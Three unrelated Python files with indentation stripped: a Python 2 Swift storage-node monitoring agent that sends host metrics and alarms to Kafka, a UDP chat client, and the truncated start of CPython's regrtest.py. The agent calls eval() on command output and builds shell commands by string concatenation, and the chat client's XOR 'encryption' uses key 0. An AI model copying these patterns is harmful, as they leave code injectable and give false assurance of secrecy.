regex = re.compile('\s+')
disk['scsi_type'] = regex.split(data)[1].strip()
if str(disk['scsi_type']).upper() == "DISK":
disk_id = re.search("[:0-9]+", data)
if disk_id :
disk['disk_id'] = disk_id.group(0).strip()
else:
continue
disk_lname = re.search("/dev/.*", data)
if disk_lname :
disk['disk_lname'] = disk_lname.group(0).strip()
else:
disk['disk_lname'] = "-"
disk['disk_manufacturer'] = regex.split(data)[2].strip()
scsirec.append(disk)
return scsirec
except Exception as ex:
raise RuntimeError("get_lsscsi_disk_info function excute exception:" + str(ex))
def get_lsi_diskgroup_info(self,adapter='0', startline='DISK GROUP: 0', endline='DISK GROUP: 1'):
'''
获取LSI厂家的磁盘组信息
:param adapter:
:param startline:
:param endline:
:return:
'''
try:
groupdata = util.excute_command('/opt/MegaRAID/MegaCli/MegaCli64 -CfgDsply -a '+ adapter)
groupinfo = re.search("{}[\s\S]*{}\n".format(startline,endline), groupdata)
if groupinfo:
return groupinfo.group(0)
else:
endline = "Exit Code: 0x00"
groupinfo = re.search("{}[\s\S]*{}".format(startline, endline), groupdata)
if groupinfo:
return groupinfo.group(0)
else:
return "N/A"
except Exception as ex:
logger.exception("get_lsi_diskgroup_info function excute exception:" + str(ex))
def get_rings(self):
'''
获取/etc/swift下的ring.gz,
:return:
'''
try:
result = util.excute_command("ls /etc/swift/ |grep \"ring.gz\|swift.conf\"")
if result :
parser = result.split('\n')
parser = filter(lambda x: x, parser)
return parser
except Exception as ex:
logger.exception("get_rings function excute exception:" + str(ex))
def get_ring_file_md5(self, ring_gz_name):
'''
根据文件名计算文件内容的md5值
:param ring_gz_name:
:return:
'''
ring_gz_name = '/etc/swift/' + ring_gz_name
try:
result = util.excute_command('md5sum %s'%(ring_gz_name))
if result :
parser = result.split(' ')
ring_md5 = parser[0]
return ring_md5
except Exception as ex:
logger.exception("get_ring_file_md5 function excute exception:" + str(ex))
def get_cluster_ring_info(self):
'''
根据swift ring文件收集集群配置信息
:return:
'''
try:
ringinfo = {}
ac_ring = {}
cn_ring = {}
ob_ring = {}
process_stat = util.excute_command('ps -ef |grep python |grep swift')
if process_stat:
pro_parser = reg_templates.NodeServiceParser(process_stat)
pro_res = pro_parser.parse()
if pro_res.has_key('srv_proxy'):
if os.path.exists('/etc/swift/account.builder'):
res_ac = util.excute_command("swift-ring-builder account.builder |sed -n '2p'")
ac_parser = reg_templates.RingParser(res_ac)
tmp_res = ac_parser.parse()
if tmp_res:
for key in tmp_res.keys():
ac_ring[key] = str(tmp_res[key]).strip()
ringinfo['account'] = ac_ring
if os.path.exists('/etc/swift/container.builder'):
res_cn = util.excute_command("swift-ring-builder container.builder |sed -n '2p'")
cn_parser = reg_templates.RingParser(res_cn)
tmp_res = cn_parser.parse()
if tmp_res:
for key in tmp_res.keys():
cn_ring[key] = str(tmp_res[key]).strip()
ringinfo['container'] = cn_ring
if os.path.exists('/etc/swift/object.builder'):
res_ob = util.excute_command("swift-ring-builder object.builder |sed -n '2p'")
ob_parser = reg_templates.RingParser(res_ob)
tmp_res = ob_parser.parse()
if tmp_res:
for key in tmp_res.keys():
ob_ring[key] = str(tmp_res[key]).strip()
ringinfo['object'] = ob_ring
if ringinfo:
return json.dumps(ringinfo,ensure_ascii=True,encoding='utf-8')
else:
return None
except Exception as ex:
logger.exception("get_cluster_ring_info function excute exception:" + str(ex))
class NodeStat(object):
'''
主机运行中各种运行状态数据采集类
'''
def __init__(self):
pass
def get_sys_stat_info(self):
'''
获取主机的运行状态数据,主要来源于top命令
:return:
'''
try:
rec = {}
data = util.excute_command('top -bi -n 2 -d 0.02') # 由于取第一次top命令结果不准确,故取第二次,过滤掉第一次的结果
parser = reg_templates.OsStat(data)
rec = parser.parse()
# 修正memory数据
result = psutil.virtual_memory()
rec['mem_total'] = str(result.total)
rec['mem_free'] = str(result.free)
rec['mem_used'] = str(result.used)
rec['mem_buffers'] = str(result.buffers)
sres = psutil.swap_memory()
rec['swap_total'] = str(sres.total)
rec['swap_free'] = str(sres.free)
rec['swap_used'] = str(sres.used)
rec['swap_cached'] = str(result.cached)
osres = psutil.users()
rec['host_login_users'] = len(osres)
osruntime = psutil.boot_time()
rec['host_runtime'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(osruntime))
return rec
except Exception as ex:
logger.exception("get_sys_stat_info function excute exception:" + str(ex))
def get_net_stat_info(self):
'''
获取主机每块网卡的运行数据,以字典形式返回
:return:
'''
try:
nicinfo = {}
#res = psutil.net_io_counters(pernic=True) # 获取每张网卡的状态数据
res = util.net_io_counters()
result = util.excute_command('ip a')
parser = reg_templates.EthernetParser(result)
rec = parser.parse()
nets = rec['net'].split(',')
packsent = {}
packrecv = {}
bytesent = {}
byterecv = {}
errin = {}
errout = {}
dropin = {}
dropout = {}
netused = {}
for net in nets:
if net :
tmpkey = str(net).strip()
if res.has_key(tmpkey):
bytesent[tmpkey] = str(res[tmpkey][0])
byterecv[tmpkey] = str(res[tmpkey][1])
packsent[tmpkey] = str(res[tmpkey][2])
packrecv[tmpkey] = str(res[tmpkey][3])
errin[tmpkey] = str(res[tmpkey][4])
errout[tmpkey] = str(res[tmpkey][5])
dropin[tmpkey] = str(res[tmpkey][6])
dropout[tmpkey] = str(res[tmpkey][7])
nicinfo['net_uesd'] = json.dumps(netused, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_send_packages'] = json.dumps(packsent, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_recv_packages'] = json.dumps(packrecv, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_send_bytes'] = json.dumps(bytesent, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_recv_bytes'] = json.dumps(byterecv, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_in_err'] = json.dumps(errin, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_out_err'] = json.dumps(errout, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_in_drop'] = json.dumps(dropin, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_out_drop'] = json.dumps(dropout, encoding="UTF-8", ensure_ascii=True)
return nicinfo
except Exception as ex:
logger.exception("get_net_stat_info function excute exception:" + str(ex))
def get_disk_stat_info(self):
'''
返回磁盘的使用数据,以列表形式返回
:return:
'''
try:
host = HostInfo()
hostdisks = []
disks = host.get_disk_names()
if disks:
dn = util.excute_command("ls /dev/|grep sd").split('\n')
iores = psutil.disk_io_counters(perdisk=True)
partres = psutil.disk_partitions()
for disk in dn:
diskinfo = {}
dsk = str(disk).strip()
ds = '/dev/' + dsk
tmpds = util.excute_command('blkid ' + ds)
if not tmpds or 'UUID=' not in tmpds:
continue
tmppar = reg_templates.DiskUuidParser(tmpds)
tmprec = tmppar.parse()
if tmprec.has_key('disk_uuid'):
diskinfo['disk_uuid'] = tmprec['disk_uuid']
else:
diskinfo['disk_uuid'] = 'N/A'
diskinfo['disk_name'] = dsk
mpath = '/'
for dev in partres:
if dev.device == ds:
mpath = dev.mountpoint
#unmounted disks all value is 0
tmpres = psutil.disk_usage(mpath)
if tmpres:
if '/srv/node' not in str(mpath).lower():
diskinfo['disk_total'] = 0
else:
diskinfo['disk_total'] = str(tmpres.total)
diskinfo['disk_used'] = str(tmpres.used)
diskinfo['disk_free'] = str(tmpres.free)
diskinfo['disk_percent'] = tmpres.percent
else:
diskinfo['disk_total'] = 0
diskinfo['disk_used'] = 0
diskinfo['disk_free'] = 0
diskinfo['disk_percent'] = 0
if iores and iores.has_key(dsk):
diskinfo['read_count'] = str(iores[dsk].read_count)
diskinfo['write_count'] = str(iores[dsk].write_count)
diskinfo['read_bytes'] = str(iores[dsk].read_bytes)
diskinfo['write_bytes'] = str(iores[dsk].write_bytes)
diskinfo['read_time'] = str(iores[dsk].read_time)
diskinfo['write_time'] = str(iores[dsk].write_time)
diskinfo['read_merged_count'] = str(iores[dsk].read_merged_count)
diskinfo['write_merged_count'] = str(iores[dsk].write_merged_count)
diskinfo['busy_time'] = iores[dsk].busy_time
else:
diskinfo['read_count'] = 0
diskinfo['write_count'] = 0
diskinfo['read_bytes'] = 0
diskinfo['write_bytes'] = 0
diskinfo['read_time'] = 0
diskinfo['write_time'] = 0
diskinfo['read_merged_count'] = 0
diskinfo['write_merged_count'] = 0
diskinfo['busy_time'] = 0
diskinfo['guid'] = str(uuid.uuid1())
diskinfo['data_model'] = 'SfoDiskPerform'
diskinfo['host_name'] = socket.getfqdn()
diskinfo['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
hostdisks.append(diskinfo)
return hostdisks
except Exception as ex:
logger.exception("get_disk_stat_info function excute exception:" + str(ex))
def get_cpu_freq_info(self):
'''
获取CPU每个核的频率并json化返回
:return:
'''
res = {}
try:
data = util.excute_command('ls -l /sys/devices/system/cpu/')
if data:
parser = reg_templates.CpuName(data)
rec = parser.parse()
if rec and isinstance(rec,dict):
if rec.has_key('cpu_id'):
cpuids = str(rec['cpu_id']).split(',')
for ci in cpuids:
if os.path.exists('/sys/devices/system/cpu/'+ str(ci).strip() +'/cpufreq/cpuinfo_cur_freq'):
result = util.excute_command(r'cat /sys/devices/system/cpu/'+ str(ci).strip() +'/cpufreq/cpuinfo_cur_freq')
if str(result).isdigit():
res[str(ci).strip()] = float(result)/1000000
else:
res[str(ci).strip()] = 'N/A'
else:
res[str(ci).strip()] = 'N/A'
return json.dumps(res, encoding="UTF-8", ensure_ascii=True)
except Exception as ex:
logger.exception("get_cpu_freq_info function excute exception:" + str(ex))
class InfoAcquisition(object):
'''
数据采集发送类
'''
def __init__(self):
pass
def get_host_json(self):
'''
采集主机的各种硬件信息:操作系统、BIOS、CPU、内存、网卡和磁盘的硬件相关信息
:return:数据入kafka
'''
hostinfo = HostInfo()
kfk = ProduceKafkaInfo()
try:
host = {}
host['guid'] = str(uuid.uuid1())
host['data_model'] = 'SfoHostInfo'
osinfo = hostinfo.get_os_info()
if osinfo and isinstance(osinfo,dict):
for key in osinfo.keys():
host[key] = osinfo[key]
mfinfo = hostinfo.get_bios_dev_info()
if mfinfo and isinstance(mfinfo,dict):
for key in mfinfo.keys():
host[key] = mfinfo[key]
cpuinfo = hostinfo.get_cpu_dev_info()
if cpuinfo[0] and isinstance(cpuinfo[0],dict):
for key in cpuinfo[0].keys():
host[key] = cpuinfo[0][key]
nicinfo = hostinfo.get_net_dev_info()
if nicinfo and isinstance(nicinfo,dict):
for key in nicinfo.keys():
host[key] = nicinfo[key]
diskinfo = hostinfo.get_disk_dev_info()
if diskinfo and isinstance(diskinfo,dict):
for key in diskinfo.keys():
host[key] = diskinfo[key]
host['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(host, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_host_json function excute exception:" + str(ex))
def get_node_json(self, model):
'''
将系统运行的性能数据、主机网卡性能数据收集并存入kafka中
:param model: 传入数据model名
:return: 数据入kafka
'''
nodestat = NodeStat()
kfk = ProduceKafkaInfo()
node = {}
try:
node['guid'] = str(uuid.uuid1())
node['data_model'] = model
node['host_name'] = socket.getfqdn()
nodesysinfo = nodestat.get_sys_stat_info()
if nodesysinfo and isinstance(nodesysinfo,dict):
for key in nodesysinfo.keys():
node[key] = nodesysinfo[key]
nodenetinfo = nodestat.get_net_stat_info()
if nodenetinfo and isinstance(nodenetinfo,dict):
for key in nodenetinfo.keys():
node[key] = nodenetinfo[key]
node['cpu_core_used'] = psutil.cpu_percent(interval=1, percpu=True)
cpu_freq = nodestat.get_cpu_freq_info()
if util.is_json(cpu_freq):
node['cpu_core_frq'] = cpu_freq
else:
node['cpu_core_frq'] = json.dumps(cpu_freq, encoding="UTF-8", ensure_ascii=True)
node['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(node, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_node_json function excute exception:" + str(ex))
def get_node_disk_stat_json(self):
'''
将节点的磁盘信息和性能数据json化后生产入kafka
:return: 数据入kafka
'''
kfk = ProduceKafkaInfo()
try:
node = NodeStat()
res = node.get_disk_stat_info()
if res:
data = json.dumps(res, encoding="UTF-8", ensure_ascii=True)
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_node_disk_stat_json function excute exception:" + str(ex))
def get_ring_json(self):
'''
获取主机上主要文件的md5值
:return: 数据入kafka
'''
hostinfo = HostInfo()
kfk = ProduceKafkaInfo()
rings = hostinfo.get_rings()
hostname = socket.getfqdn()
ip = socket.gethostbyname(hostname)
ring = {}
ring_ins = {}
extend = {}
try:
for ring_name in rings:
ring_md5 = hostinfo.get_ring_file_md5(ring_name)
ring_ins.update({ring_name: ring_md5})
ring['guid'] = str(uuid.uuid1())
ring['data_model'] = 'SfoHostRing'
ring['rings_md5'] = json.dumps(ring_ins,encoding="UTF-8", ensure_ascii=True)
ring['host_name'] = hostname
ring['ip_addr'] = ip
ring['ring_info'] = hostinfo.get_cluster_ring_info()
if os.path.exists("/etc/swift/passwd"):
extend['passwdmd5'] = util.excute_command("md5sum /etc/swift/passwd |awk '{print $1}'")
if os.path.exists("/etc/swift/object-server/object-rep-server.conf"):
extend['object-rep-server.conf'] = util.excute_command("md5sum /etc/swift/object-server/object-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/object-server/object-server.conf"):
extend['object-server.conf'] = util.excute_command("md5sum /etc/swift/object-server/object-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/account-server/account-rep-server.conf"):
extend['account-rep-server.conf'] = util.excute_command("md5sum /etc/swift/account-server/account-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/account-server/account-server.conf"):
extend['account-server.conf'] = util.excute_command("md5sum /etc/swift/account-server/account-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/container-server/container-rep-server.conf"):
extend['container-rep-server.conf'] = util.excute_command("md5sum /etc/swift/container-server/container-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/container-server/container-rep-server.conf"):
extend['container-server.conf'] = util.excute_command("md5sum /etc/swift/container-server/container-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/proxy-server.conf"):
extend['proxy-server.conf'] = util.excute_command("md5sum /etc/swift/proxy-server.conf |awk '{print $1}'")
ring['extend'] = json.dumps(extend, encoding="UTF-8", ensure_ascii=True)
ring['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(ring, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception, ex:
logger.exception("get_ring_json function excute exception:" + str(ex))
def get_host_monitor_json(self):
'''
获取监控数据
同时产生主机的CPU、内存、网络和磁盘使用率告警信息
:return: 数据入kafka
'''
pri = ProduceKafkaInfo()
try:
data = {}
netstatinfo = {}
netuseinfo = {}
fileinfo = {}
filerwinfo = {}
data['guid'] = str(uuid.uuid1())
data['data_model'] = 'SfoHostMonitor'
data['cluster_name'] = config.swift_cluster_name
data['host_name'] = socket.getfqdn()
#cpu used rate
cpurate = psutil.cpu_percent(interval=1, percpu=False)
data['host_cpu_rate'] = cpurate
if float(cpurate) - 60.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "cpu-rate-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'CPU-USED'
if float(cpurate) - 80.0 > 0:
alarmdata['alarm_message'] = 'host cpu has used {}%,it`s more than 80 percent'.format("%.2f"%cpurate)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'host cpu has used {}%,it`s more than 60 percent'.format("%.2f"%cpurate)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata,encoding='utf-8',ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic,alert)
#memery used rate
memrate = psutil.virtual_memory()
data['host_mem_rate'] = memrate.percent
if float(memrate.percent) - 60.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "memory-rate-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'MEM-USED'
if float(memrate.percent) - 90.0 > 0:
alarmdata['alarm_message'] = 'host memory has used {}%,it`s more than 90 percent'.format("%.2f"%memrate.percent)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'host memory has used {}%,it`s more than 60 percent'.format("%.2f"%memrate.percent)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata,encoding='utf-8',ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
#net stat and used info
netstat = psutil.net_if_stats()
netuse1 = psutil.net_io_counters(pernic=True)
time.sleep(1)
netuse2 = psutil.net_io_counters(pernic=True)
for key in netstat.keys():
if 'eth' in str(key).lower() or 'bond' in str(key).lower():
if str(netstat[key].isup).upper() == 'TRUE':
netstatinfo[key] = 'OK'
netspeed = netstat[key].speed
if netspeed > 0:
#byte -> Mb 1048576 = 1024 * 1024
sent = (float(netuse2[key].bytes_sent) - float(netuse1[key].bytes_sent))*8/1048576/float(netspeed)
recv = (float(netuse2[key].bytes_recv) - float(netuse1[key].bytes_recv))*8/1048576/float(netspeed)
if sent - recv > 0:
netuseinfo[key] = round(sent,4)
else:
netuseinfo[key] = round(recv,4)
if float(netuseinfo[key]) - 0.3 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-rate-{}".format(str(key),str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'NET-USED'
if float(netuseinfo[key]) - 0.4 > 0:
alarmdata['alarm_message'] = 'network card traffic has used {}%,it`s more than 40 percent'.format("%.2f"%(float(netuseinfo[key])*100))
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'network card traffic has used {}%,it`s more than 30 percent'.format("%.2f"%(float(netuseinfo[key])*100))
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
else:
netuseinfo[key] = 0.0
else:
netstatinfo[key] = 'DOWN'
data['host_net_rate'] = json.dumps(netuseinfo, encoding="UTF-8", ensure_ascii=True)
data['host_net_stat'] = json.dumps(netstatinfo, encoding="UTF-8", ensure_ascii=True)
#disk stat
data['host_disk_stat'] = ''
#file system info
disks = psutil.disk_partitions()
for disk in disks:
disk_usage = psutil.disk_usage(disk.mountpoint)
fileinfo[disk.mountpoint] = disk_usage.percent
if float(disk_usage.percent) - 70.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-file-rate-{}".format(str(disk.mountpoint), str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'FILE-USED'
if float(disk_usage.percent) - 80.0 > 0:
alarmdata['alarm_message'] = 'the file system capacity has used {}%,it`s more than 80 percent'.format("%.2f"%disk_usage.percent)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'the file system capacity has used {}%,it`s more than 70 percent'.format("%.2f"%disk_usage.percent)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
filecmd = "touch {}".format(str(disk.mountpoint+'/sfo_test.txt'))
if util.excute_command(filecmd) == "SUCCESS":
filerwinfo[disk.mountpoint] = 'OK'
else:
unwrited = False
for retry in range(4):
if util.excute_command(filecmd) == "SUCCESS":
filerwinfo[disk.mountpoint] = 'OK'
unwrited = False
break
else:
unwrited = True
time.sleep(1)
if unwrited:
filerwinfo[disk.mountpoint] = 'ERROR'
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-file-write-{}".format(str(disk.mountpoint), str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'FILE-WRITE'
alarmdata['alarm_message'] = 'the file system {} can not write success'.format(str(disk.mountpoint))
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
data['host_file_rate'] = json.dumps(fileinfo, encoding="UTF-8", ensure_ascii=True)
data['host_rw_file'] = json.dumps(filerwinfo, encoding="UTF-8", ensure_ascii=True)
#ntp time
data['host_ntp_time'] = 101.1
#extend
extend = {}
#ntpd.service
extend['ntpd'] = util.excute_command("systemctl status ntpd.service|grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
if 'running' != str(extend['ntpd']).strip().lower():
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "ntpd-service-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "software"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'NTP Service'
alarmdata['alarm_message'] = 'the host ntpd service is not running'
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
else:
data['host_ntp_time'] = util.excute_command("ntpq -p |sed -n '3p'|awk '{print $9}'")
# ntp time alarm
if type(eval(str(data['host_ntp_time']))) == float:
if abs(float(data['host_ntp_time'])) - 100.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "time-offset-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "software"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'Time Offset'
alarmdata['alarm_message'] = 'the host time offset was {},it`s off ntp server more than 100 ms'.format("%.2f" % abs(float(data['host_ntp_time'])))
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
#memcached
extend['memcached'] = util.excute_command("systemctl status memcached |grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
#rsyncd
extend['rsyncd'] = util.excute_command("systemctl status rsyncd.service|grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
data['extend'] = json.dumps(extend, encoding="UTF-8", ensure_ascii=True)
data['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(data, encoding="UTF-8", ensure_ascii=True)
if data:
pri.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_host_monitor_json function excute exception:" + str(ex))
|
client.py
|
import socket, threading, time
key = 0
server = ('192.168.1.49',9090) # default server
host = socket.gethostbyname(socket.gethostname())
#host = '192.168.1.49'
port = 0
shutdown = False
join = False
def receiving (name, sock):
while not shutdown:
try:
while True:
data, addr = sock.recvfrom(1024)
my_time = time.ctime()
# decription
decrypt = ""; k = False
for i in data.decode("utf-8"):
if i == ":":
k = True
decrypt += i
elif k == False or i == " ":
decrypt += i
else:
decrypt += chr(ord(i)^key)
print("[" + str(my_time) + "] " + decrypt)
time.sleep(0.2)
except:
pass
my_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
my_socket.bind((host,port))
my_socket.setblocking(0)
print("You joined to " + str(server))
# поиск имени в конфиге
userC = open('user_settings.txt', 'r')
user_name = userC.readline()
if user_name == "":
user_name = str(input("Please, write your nickname... "))
u = open('user_settings.txt', 'w')
u.write(user_name)
u.close()
userC.close()
thread = threading.Thread(target = receiving, args = ("RecvThread", my_socket))
thread.start()
while shutdown == False:
if join == False:
my_socket.sendto((user_name + " => join chat ").encode("utf-8"), server)
join = True
else:
try:
message = input()
# Begin
crypt = ""
for i in message:
crypt += chr(ord(i)^key)
message = crypt
# End
if message != "":
my_socket.sendto((user_name + ":: "+message).encode("utf-8"), server)
time.sleep(0.2)
except:
my_socket.sendto((user_name + " <= left chat ").encode("utf-8"), server)
shutdown = True
thread.join()
my_socket.close()
|
regrtest.py
|
#! /usr/bin/env python3
"""
Script to run Python regression tests.
Run this script with -h or --help for documentation.
"""
USAGE = """\
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
"""
DESCRIPTION = """\
Run Python regression tests.
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
"""
EPILOG = """\
Additional option details:
-r randomizes test execution order. You can use --randseed=int to provide a
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, which process tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order a standard run (ie, this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines howmuch memory the
tests will limit themselves to (but they may go slightly over.) The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import argparse
import builtins
import faulthandler
import io
import json
import locale
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import _multiprocessing, multiprocessing.process
except ImportError:
multiprocessing = None
# Some times __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
